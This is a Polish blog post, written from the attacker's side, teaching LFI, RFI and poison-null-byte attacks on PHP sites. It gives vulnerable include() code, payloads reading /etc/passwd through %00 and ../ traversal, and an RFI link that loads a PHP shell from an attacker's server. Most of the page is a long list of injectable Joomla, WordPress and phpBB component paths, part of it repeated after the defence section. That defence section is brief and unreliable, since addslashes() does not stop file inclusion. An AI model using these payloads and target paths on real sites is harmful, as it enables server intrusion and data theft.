Ataki typu LFI, RFI oraz Poison Null Byte

luskaŻyjemy w czasach technologi PHP5. Webmasterzy już dawno zaprzestali tworzenia stron w oparciu o statyczny HTML. Dziś adresy URL nie wyglądają tak:

www.strona.pl/index.html

A raczej tak:

www.strona.pl/?strona=glowna

Atak LFI

W powyższym przykładzie skrypt PHP ma za zadanie pobierać wartość zmiennej strona, a następnie w zależności od jej wartości includować odpowiedni plik. Załóżmy, że mamy w katalogu z indexem plik o nazwie glowna z jakąś treścią. Najprostszy podatny na atak skrypt PHP wygląda następująco:

<?php
if(!empty($_GET['strona'])) //jesli zmienna 'strona' nie jest pusta
{
	include($_GET['strona']); //includujemy wartosc tej zmiennej
}
?>

Jeśli adres będzie wyglądał tak jak wymyślił sobie to programista

?strona=glowna

Na ekranie zostanie wyświetlona zawartość pliku o nazwie glowna z obecnego katalogu. Co natomiast, jeśli przebiegły odwiedzający stronę zechce sfalsyfikować adres dopisując na końcu apostrof?

?strona=glowna’

Na stronie pojawi się błąd

Warning: include(glowna’) [function.include]: failed to open stream: No such file or directory in /home/komeniusz/public_html/lfi/index.php on line 4

Warning: include() [function.include]: Failed opening 'glowna” for inclusion (include_path=’.:/usr/share/php:/usr/share/pear’) in /home/komeniusz/public_html/lfi/index.php on line 4

Poinformuje on agresora o tym, iż skrypt jest podatny na atak typu LFI (Local File Include). LFI to błąd umożliwiający odczytanie pliku z lokalnego serwera po podaniu w wartości zmiennej jego nazwy oraz ścieżki dostępu. Funkcje narażone na niebezpieczne użycie to file(), fread(), get_content() oraz include(). Dzięki tej luce w zabezpieczeniu można odczytać przykładowo plik /etc/passwd

Atak RFI

Atak typu RFI (Remote File Include) różni się od LFI jedynie tym, że plik wczytywany jest z zdalnego serwera. Dzięki temu agresor może odpalić na atakowanej stronie skrypt z swojego serwera jak np. shella php.

Spreparowany link zawierałby pełny adres URL

?strona=http://strona.pl/agresor/shell.txt

Rozszerzenie .txt, gdyż skrypt ma się uruchomić na atakowanym serwerze, a nie na serwerze agresora.

Uwagi

W pierwszym skrypcie podatnym na atak LFI założyliśmy, że treść stron przechowywana jest w zwykłych plikach tekstowych bez rozszerzenia, co jest niezwykłą rzadkością ze względu na obecny poziom zaawansowania CMS’ów. Przeważnie taki skrypt dodaje na końcu wartości zmiennej rozszerzenie .php, co za tym idzie próba odczytania pliku /etc/passwd zakończy się fiaskiem, gdyż skrypt będzie próbował wczytać plik /etc/passwd.php.

Ale na szczęście i na to jest prosta rada. Należy zapoznać się z atakiem typu Null Byte (bajt zerowy).

Poison Null Byte

Skrypt, o którym przed chwilą była mowa jest bardzo podobny do swojego poprzednika, lecz na końcu nazwy pliku dodaje rozszerzenie .php

<?php
if(!empty($_GET['strona'])) //jesli zmienna 'strona' nie jest pusta
{
	include($_GET['strona'].'.php'); //includujemy wartosc tej zmiennej i dodajemy rozszerzenie *.php
}
?>

Po próbie odczytania pliku /etc/passwd zostaniemy poinformowaniu o niepowodzeniu.

Warning: include(/etc/passwd.php) [function.include]: failed to open stream: No such file or directory in /home/komeniusz/public_html/lfi/index.php on line 4

Warning: include() [function.include]: Failed opening '/etc/passwd.php’ for inclusion (include_path=’.:/usr/share/php:/usr/share/pear’) in /home/komeniusz/public_html/lfi/index.php on line 4

Jak zatem pomoże nam tutaj bajt zerowy? Otóż bajt zerowy w PHP ma postać %00. Wszystko co znajduje się po nim jest ignorowane. To taki 'super-komentarz’. Zmienna zatem winna wyglądać tak:

?strona=/etc/passwd%00

Bądź

?strona=/etc/passwd%2500

Jeśli i to nie pomoże nam odczytać pliku powinniśmy trochę zejść z drzewa katalogów w dół za pomocą ../

?strona=../../etc/passwd%00

Schodzimy tak długo, aż nie natrafimy na nasz docelowy plik.
Oczywiście może się zdarzyć, że atak z bajtem zerowym także nie przejdzie. W takiej sytuacji oznacza, że tą drogą nic nie osiągniemy i należy szukać dalej.

Dziury w popularnych CMS’ach

Joomla oraz Mamboo

/components/com_flyspray/startdown.php?file=
/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
/components/com_simpleboard/file_upload.php?sbp=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
/components/minibb/index.php?absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
/components/com_securityimages/lang.php?mosConfig_absolute_path=
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
/akocomments.php?mosConfig_absolute_path=
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/cropcanvas.php?cropimagedir=
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=
/components/com_zoom/includes/database.php?mosConfig_absolute_path=
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
/components/com_fm/fm.install.php?lm_absolute_path=
/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
/components/com_lmo/lmo.php?mosConfig_absolute_path=
/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=
/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=
/administrator/components/com_webring/admin.webring.docs.php?component_dir=
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
/components/com_mambowiki/Mam***ogin.php?IP=
/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
/components/com_cpg/cpg.php?mosConfig_absolute_path=
/components/com_moodle/moodle.php?mosConfig_absolute_path=
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
/components/com_mospray/scripts/admin.php?basedir=
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=
/components/com_madeira/img.php?url=
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=
/com_bsq_sitestats/external/rssfeed.php?baseDir=
/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=
/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=
/components/com_joomlaboard/file_upload.php?sbp=
/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=
/modules/mod_weather.php?absolute_path=
/components/calendar/com_calendar.php?absolute_path=
/modules/calendar/mod_calendar.php?absolute_path=
/components/com_calendar.php?absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=
/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=
/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=

WordPress

index/wp-content/plugins/Enigma2.php?boarddir=
mygallery/myfunctions/mygallerybrowser.php?myPath=
plugins/wp-table/js/wptable-button.phpp?wpPATH=
plugins/wordtube/wordtube-button.php?wpPATH=
plugins/myflash/myflash-button.php?wpPATH=
plugins/BackUp/Archive.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=
plugins/sniplets/modules/syntax_highlight.php?libpath=

PhpBB

/includes/functions.php?phpbb_root_path=
/ezconvert/config.php?ezconvert_dir=
/includes/class_template.php?phpbb_root_path=
/includes/usercp_viewprofile.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
menu.php?sesion_idioma=
/includes/functions.php?phpbb_root_path=
/admin/admin_linkdb.php?phpbb_root_path=
/admin/admin_forum_prune.php?phpbb_root_path=
/admin/admin_extensions.php?phpbb_root_path=
/admin/admin_board.php?phpbb_root_path=
/admin/admin_attachments.php?phpbb_root_path=
/admin/admin_users.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/admin/modules_data.php?phpbb_root_path=
/faq.php?foing_root_path=
/index.php?foing_root_path=
/list.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/gen_m3u.php?foing_root_path=
/view_artist.php?foing_root_path=
/view_song.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/flash/set_na.php?foing_root_path=
/flash/initialise.php?foing_root_path=
/flash/get_song.php?foing_root_path=
/includes/common.php?foing_root_path=
/admin/nav.php?foing_root_path=
/admin/main.php?foing_root_path=
/admin/list_artists.php?foing_root_path=
/admin/index.php?foing_root_path=
/admin/genres.php?foing_root_path=
/admin/edit_artist.php?foing_root_path=
/admin/edit_album.php?foing_root_path=
/admin/config.php?foing_root_path=
/admin/admin_status.php?foing_root_path=
language/lang_english/lang_prillian_faq.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/language/lang_french/lang_prillian_faq.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/functions_rpg_events.php?phpbb_root_path=
/admin/admin_spam.php?phpbb_root_path=
/includes/functions_newshr.php?phpbb_root_path=
/zufallscodepart.php?phpbb_root_path=
/mods/iai/includes/constants.php?phpbb_root_path=
/root/includes/antispam.php?phpbb_root_path=
/phpBB2/shoutbox.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/journals_delete.php?phpbb_root_path=
/includes/journals_post.php?phpbb_root_path=
/includes/journals_edit.php?phpbb_root_path=
/includes/functions_num_image.php?phpbb_root_path=
/includes/functions_user_viewed_posts.php?phpbb_root_path=
/includes/themen_portal_mitte.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/includes/functions_static_topics.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=
/includes/functions_kb.php?phpbb_root_path=
/includes/bbcb_mg.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=
/includes/pafiledb_constants.php?module_root_path=
/index.php?phpbb_root_path=
/song.php?phpbb_root_path=
/faq.php?phpbb_root_path=
/list.php?phpbb_root_path=
/gen_m3u.php?phpbb_root_path=
/playlist.php?phpbb_root_path=
/language/lang_english/lang_activity.php?phpbb_root_path=
/language/lang_english/lang_activity.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/modules/Forums/admin/index.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_board.php?phpbb_root_path=
/modules/Forums/admin/admin_disallow.php?phpbb_root_path=
/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=
/modules/Forums/admin/admin_groups.php?phpbb_root_path=
/modules/Forums/admin/admin_ranks.php?phpbb_root_path=
/modules/Forums/admin/admin_styles.php?phpbb_root_path=
/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=
/modules/Forums/admin/admin_words.php?phpbb_root_path=
/modules/Forums/admin/admin_avatar.php?phpbb_root_path=
/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=
/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=
/modules/Forums/admin/admin_forums.php?phpbb_root_path=
/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=
/modules/Forums/admin/admin_smilies.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_users.php?phpbb_root_path=
/stat_modules/users_age/module.php?phpbb_root_path=
/includes/functions_cms.php?phpbb_root_path=
/m2f/m2f_phpbb204.php?m2f_root_path=
/m2f/m2f_forum.php?m2f_root_path=
/m2f/m2f_mailinglist.php?m2f_root_path=
/m2f/m2f_cron.php?m2f_root_path=
/lib/phpbb.php?subdir=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_admin.php?phpbb_root_path=
/toplist.php?f=toplist_top10&phpbb_root_path=
/admin/addentry.php?phpbb_root_path=
/includes/kb_constants.php?module_root_path=
/auth/auth.php?phpbb_root_path=
/auth/auth_phpbb/phpbb_root_path=
/auction/auction_common.php?phpbb_root_path=
/auth/auth_SMF/smf_root_path=
/auth/auth.php?smf_root_path=

Zabezpieczenie

Jak można zauważyć ryzyko płynące z tego typu ataków jest potencjalnie ogromne. Aby zwiększyć bezpieczeństwo naszej strony powinniśmy ustawiać odpowiednie ograniczenia na katalogi nadrzędne oraz stosować funkcje zabezpieczające takie jak addslashes() na zmiennych.

/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=
/language/lang_german/lang_main_album.php?phpbb_root_path=
link_main.php?phpbb_root_path=
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=
MOD_forum_fields_parse.php?phpbb_root_path=
/codebb/pass_code.php?phpbb_root_path=
/codebb/lang_select?phpbb_root_path=
includes/functions_nomoketos_rules.php?phpbb_root_path=
includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/ezconvert/config.php?ezconvert_dir=
/includes/class_template.php?phpbb_root_path=
/includes/usercp_viewprofile.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
menu.php?sesion_idioma=
/includes/functions.php?phpbb_root_path=
/admin/admin_linkdb.php?phpbb_root_path=
/admin/admin_forum_prune.php?phpbb_root_path=
/admin/admin_extensions.php?phpbb_root_path=
/admin/admin_board.php?phpbb_root_path=
/admin/admin_attachments.php?phpbb_root_path=
/admin/admin_users.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/admin/modules_data.php?phpbb_root_path=
/faq.php?foing_root_path=
/index.php?foing_root_path=
/list.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/gen_m3u.php?foing_root_path=
/view_artist.php?foing_root_path=
/view_song.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/flash/set_na.php?foing_root_path=
/flash/initialise.php?foing_root_path=
/flash/get_song.php?foing_root_path=
/includes/common.php?foing_root_path=
/admin/nav.php?foing_root_path=
/admin/main.php?foing_root_path=
/admin/list_artists.php?foing_root_path=
/admin/index.php?foing_root_path=
/admin/genres.php?foing_root_path=
/admin/edit_artist.php?foing_root_path=
/admin/edit_album.php?foing_root_path=
/admin/config.php?foing_root_path=
/admin/admin_status.php?foing_root_path=
language/lang_english/lang_prillian_faq.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/language/lang_french/lang_prillian_faq.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/functions_rpg_events.php?phpbb_root_path=
/admin/admin_spam.php?phpbb_root_path=
/includes/functions_newshr.php?phpbb_root_path=
/zufallscodepart.php?phpbb_root_path=
/mods/iai/includes/constants.php?phpbb_root_path=
/root/includes/antispam.php?phpbb_root_path=
/phpBB2/shoutbox.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/journals_delete.php?phpbb_root_path=
/includes/journals_post.php?phpbb_root_path=
/includes/journals_edit.php?phpbb_root_path=
/includes/functions_num_image.php?phpbb_root_path=
/includes/functions_user_viewed_posts.php?phpbb_root_path=
/includes/themen_portal_mitte.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/includes/functions_static_topics.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=
/includes/functions_kb.php?phpbb_root_path=
/includes/bbcb_mg.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=
/includes/pafiledb_constants.php?module_root_path=
/index.php?phpbb_root_path=
/song.php?phpbb_root_path=
/faq.php?phpbb_root_path=
/list.php?phpbb_root_path=
/gen_m3u.php?phpbb_root_path=
/playlist.php?phpbb_root_path=
/language/lang_english/lang_activity.php?phpbb_root_path=
/language/lang_english/lang_activity.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/modules/Forums/admin/index.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_board.php?phpbb_root_path=
/modules/Forums/admin/admin_disallow.php?phpbb_root_path=
/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=
/modules/Forums/admin/admin_groups.php?phpbb_root_path=
/modules/Forums/admin/admin_ranks.php?phpbb_root_path=
/modules/Forums/admin/admin_styles.php?phpbb_root_path=
/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=
/modules/Forums/admin/admin_words.php?phpbb_root_path=
/modules/Forums/admin/admin_avatar.php?phpbb_root_path=
/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=
/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=
/modules/Forums/admin/admin_forums.php?phpbb_root_path=
/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=
/modules/Forums/admin/admin_smilies.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_users.php?phpbb_root_path=
/stat_modules/users_age/module.php?phpbb_root_path=
/includes/functions_cms.php?phpbb_root_path=
/m2f/m2f_phpbb204.php?m2f_root_path=
/m2f/m2f_forum.php?m2f_root_path=
/m2f/m2f_mailinglist.php?m2f_root_path=
/m2f/m2f_cron.php?m2f_root_path=
/lib/phpbb.php?subdir=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_admin.php?phpbb_root_path=
/toplist.php?f=toplist_top10&phpbb_root_path=
/admin/addentry.php?phpbb_root_path=
/includes/kb_constants.php?module_root_path=
/auth/auth.php?phpbb_root_path=
/auth/auth_phpbb/phpbb_root_path=
/auction/auction_common.php?phpbb_root_path=
/auth/auth_SMF/smf_root_path=
/auth/auth.php?smf_root_path=

4 thoughts on “Ataki typu LFI, RFI oraz Poison Null Byte

  1. Fajnie napisane 🙂
    W szczególności przydadzą się te dziurki ;), jak będę potrzebował to wiem gdzie szukać 😀

  2. Udany artykuł. Brawa dla autora :D. Roześlę linki do tej strony znajomym, myślę, że też powinni ją polubić. Liczmy na to, że takie witryny nadal będą funkcjonowały w polskim necie pomimo podpisania ACTA przez Polskę. Sądzę, że będę wpadać tu w przyszłości.

    Życzę sukcesów ! – Konstanty Kozłowski

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *